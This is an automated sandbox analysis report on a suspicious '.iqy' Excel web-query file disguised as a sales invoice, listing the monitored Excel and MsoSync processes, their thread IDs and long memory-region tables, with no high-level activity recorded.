ca0da220f7691059b3174b2de14bd41ddb96bf3f02a2824b2b8c103215c7403c (SHA256)
Sales invoice Z12_01 copy.iqy.iqy
Excel Document
Created at 2018-06-06 09:51:00
Notifications (2/2)
The overall sleep time of all monitored processes was truncated from "3 minutes, 21 seconds" to "2 seconds" to reveal dormant functionality.
Monitored Processes
Behavior Information - Grouped by Category
Process #1: excel.exe
0
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office16\excel.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office16\EXCEL.EXE" |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:00:31, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:07 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x82c |
| Parent PID | 0x5d8 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
94C
0x
938
0x
950
0x
934
0x
738
0x
91C
0x
368
0x
71C
0x
728
0x
708
0x
70C
0x
7A8
0x
770
0x
7B4
0x
7B0
0x
74C
0x
754
0x
758
0x
75C
0x
760
0x
764
0x
76C
0x
724
0x
700
0x
720
0x
838
0x
834
0x
928
0x
92C
0x
930
0x
8FC
0x
8F8
0x
924
0x
908
0x
97C
0x
7A4
0x
7D8
0x
314
0x
374
0x
15C
0x
6E8
0x
9A0
0x
9A8
0x
0
0x
AF4
0x
B48
0x
5C8
0x
908
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00141fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00166fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003cefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01d2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d30000 | 0x01d30000 | 0x01d34fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d40000 | 0x01d40000 | 0x01d40fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01e4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e50000 | 0x01e50000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001ed0000 | 0x01ed0000 | 0x01ed0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01ee0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01feffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ff0000 | 0x01ff0000 | 0x01ff0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x02000fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002010000 | 0x02010000 | 0x02010fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x02020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x0212ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02522fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02530000 | 0x027fefff | Memory Mapped File | Readable |
|
|
|
- |
| xlintl32.dll | 0x02800000 | 0x03841fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003850000 | 0x03850000 | 0x03850fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003860000 | 0x03860000 | 0x03861fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003870000 | 0x03870000 | 0x03871fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003880000 | 0x03880000 | 0x03881fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x0389ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x038b1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000038c0000 | 0x038c0000 | 0x038c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000038d0000 | 0x038d0000 | 0x038d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000038e0000 | 0x038e0000 | 0x038e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000038f0000 | 0x038f0000 | 0x038f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003900000 | 0x03900000 | 0x03901fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000003910000 | 0x03910000 | 0x03911fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003920000 | 0x03920000 | 0x03a1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003a20000 | 0x03a20000 | 0x03a31fff | Private Memory | Readable, Writable |
|
|
|
- |
| comdlg32.dll.mui | 0x03a40000 | 0x03a4cfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003a50000 | 0x03a50000 | 0x03a51fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x03a60000 | 0x03a7ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003a80000 | 0x03a80000 | 0x03a80fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003a90000 | 0x03a90000 | 0x03b8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003b90000 | 0x03b90000 | 0x03c8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x03d8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| c_1255.nls | 0x03d90000 | 0x03da0fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x03db0000 | 0x03db3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003dc0000 | 0x03dc0000 | 0x03ebffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003ec0000 | 0x03ec0000 | 0x042bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000042c0000 | 0x042c0000 | 0x042c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000042d0000 | 0x042d0000 | 0x0434ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x04350fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004360000 | 0x04360000 | 0x04360fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004370000 | 0x04370000 | 0x0446ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004470000 | 0x04470000 | 0x04c6ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| segoeui.ttf | 0x04c70000 | 0x04ceefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04cf0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| segoeuil.ttf | 0x04d80000 | 0x04dd0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04deffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04eeffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04ef0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005000000 | 0x05000000 | 0x050fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x05100fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x0520ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005210000 | 0x05210000 | 0x0540ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005410000 | 0x05410000 | 0x05410fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005420000 | 0x05420000 | 0x05422fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005430000 | 0x05430000 | 0x05432fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005440000 | 0x05440000 | 0x05442fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005450000 | 0x05450000 | 0x05452fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005460000 | 0x05460000 | 0x0546ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005470000 | 0x05470000 | 0x05470fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005480000 | 0x05480000 | 0x05480fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005490000 | 0x05490000 | 0x054d7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000054e0000 | 0x054e0000 | 0x05527fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005530000 | 0x05530000 | 0x05531fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005540000 | 0x05540000 | 0x05540fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005550000 | 0x05550000 | 0x05550fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000005560000 | 0x05560000 | 0x0565ffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x05660000 | 0x05f8ffff | Memory Mapped File | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000d.db | 0x05f90000 | 0x05fbffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x05fc0000 | 0x05fc3fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000005fd0000 | 0x05fd0000 | 0x05fd1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000005fe0000 | 0x05fe0000 | 0x05fe1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000005ff0000 | 0x05ff0000 | 0x05ff0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006000000 | 0x06000000 | 0x06000fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006010000 | 0x06010000 | 0x06010fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006020000 | 0x06020000 | 0x06020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006030000 | 0x06030000 | 0x0612ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006130000 | 0x06130000 | 0x0652ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006530000 | 0x06530000 | 0x06530fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006540000 | 0x06540000 | 0x06540fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006550000 | 0x06550000 | 0x06550fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006560000 | 0x06560000 | 0x06560fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006570000 | 0x06570000 | 0x0666ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006670000 | 0x06670000 | 0x06670fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006680000 | 0x06680000 | 0x06680fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006690000 | 0x06690000 | 0x0669ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000066a0000 | 0x066a0000 | 0x06e9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006ea0000 | 0x06ea0000 | 0x072a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000072b0000 | 0x072b0000 | 0x076b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000076c0000 | 0x076c0000 | 0x07ac0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000007ad0000 | 0x07ad0000 | 0x07ccffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000007cd0000 | 0x07cd0000 | 0x0818ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008190000 | 0x08190000 | 0x0858ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008590000 | 0x08590000 | 0x08590fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000085a0000 | 0x085a0000 | 0x085a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000085b0000 | 0x085b0000 | 0x086affff | Private Memory | Readable, Writable |
|
|
|
- |
| tahoma.ttf | 0x086b0000 | 0x0875afff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000008760000 | 0x08760000 | 0x08760fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008770000 | 0x08770000 | 0x0886ffff | Private Memory | Readable, Writable |
|
|
|
- |
| office.odf | 0x08870000 | 0x08a28fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000008a30000 | 0x08a30000 | 0x08b2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008b30000 | 0x08b30000 | 0x08baffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008bb0000 | 0x08bb0000 | 0x08bb0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000008bc0000 | 0x08bc0000 | 0x08bc0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000008bd0000 | 0x08bd0000 | 0x08bd0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008be0000 | 0x08be0000 | 0x08beffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000008bf0000 | 0x08bf0000 | 0x08ceffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x08cf0000 | 0x08d55fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000008d60000 | 0x08d60000 | 0x08d60fff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x08d70000 | 0x08d73fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000008d80000 | 0x08d80000 | 0x08e7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db | 0x08e80000 | 0x08e80fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x08e90000 | 0x08e93fff | Memory Mapped File | Readable |
|
|
|
- |
|
For performance reasons, the remaining 336 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #2: msosync.exe
0
0
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\program files\microsoft office\office16\msosync.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office16\MsoSync.exe" |
| Initial Working Directory | C:\Users\qj4SUKboE\Desktop\ |
| Monitor | Start Time: 00:00:42, Reason: Child Process |
| Unmonitor | End Time: 00:02:38, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x998 |
| Parent PID | 0x82c (c:\program files\microsoft office\office16\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | EXB9WSP\qj4SUKboE |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
140
0x
9C0
0x
9BC
0x
57C
0x
578
0x
590
0x
714
0x
9F8
0x
9DC
0x
A20
0x
A34
0x
A44
0x
A54
0x
A64
0x
A74
0x
A84
0x
774
0x
A94
0x
AD4
0x
AE4
0x
4A8
0x
6BC
0x
0
0x
7A4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00040000 | 0x000a6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00101fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00111fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00121fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00131fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00146fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00151fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x0037efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00384fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00717fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x008a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x01caffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001cb0000 | 0x01cb0000 | 0x01cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| c_1255.nls | 0x01cc0000 | 0x01cd0fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001d50000 | 0x01d50000 | 0x01d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01ddffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01e9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fd0000 | 0x01fd0000 | 0x020cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021c0000 | 0x021c0000 | 0x022bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000022c0000 | 0x022c0000 | 0x026b2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x026c0000 | 0x0298efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002990000 | 0x02990000 | 0x02d8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02f2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x0311ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000031e0000 | 0x031e0000 | 0x032dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000032e0000 | 0x032e0000 | 0x03adffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003bc0000 | 0x03bc0000 | 0x03cbffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x03cc0000 | 0x045effff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000371e0000 | 0x371e0000 | 0x371effff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| sfc.dll | 0x73da0000 | 0x73da2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771d0000 | 0x772c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x772d0000 | 0x773eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x773f0000 | 0x77598fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x775c0000 | 0x775c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| msosync.exe | 0x13f8a0000 | 0x13f918fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007febd860000 | 0x7febd860000 | 0x7febd86ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| msptls.dll | 0x7fee6e90000 | 0x7fee6ffffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| csi.dll | 0x7fee7490000 | 0x7fee7b8dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fee81b0000 | 0x7fee824ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| riched20.dll | 0x7fee8d50000 | 0x7fee8f72fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwrite.dll | 0x7fee9020000 | 0x7fee919dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl.dll | 0x7fee91a0000 | 0x7fee931afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d10warp.dll | 0x7fee9320000 | 0x7fee94effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msores.dll | 0x7fee94f0000 | 0x7feee32efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lres.dll | 0x7feee330000 | 0x7feeec50fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uires.dll | 0x7feeec60000 | 0x7feeef67fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso.dll | 0x7feeef70000 | 0x7fef024bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso99lwin32client.dll | 0x7fef0250000 | 0x7fef0a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso40uiwin32client.dll | 0x7fef0a20000 | 0x7fef130afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso30win32client.dll | 0x7fef1310000 | 0x7fef1787fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d3d11.dll | 0x7fef2ac0000 | 0x7fef2b85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mso20win32client.dll | 0x7fef2b90000 | 0x7fef2e93fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| d2d1.dll | 0x7fef2fd0000 | 0x7fef30b1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ospintl.dll | 0x7fef7850000 | 0x7fef7854fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sppc.dll | 0x7fef7ac0000 | 0x7fef7ae6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| office.odf | 0x7fef8450000 | 0x7fef8608fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x7fef8610000 | 0x7fef8925fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp140.dll | 0x7fef8930000 | 0x7fef89cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdiplus.dll | 0x7fef8eb0000 | 0x7fef90c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msointl30.dll | 0x7fef90d0000 | 0x7fef90defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msimg32.dll | 0x7fef90e0000 | 0x7fef90e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
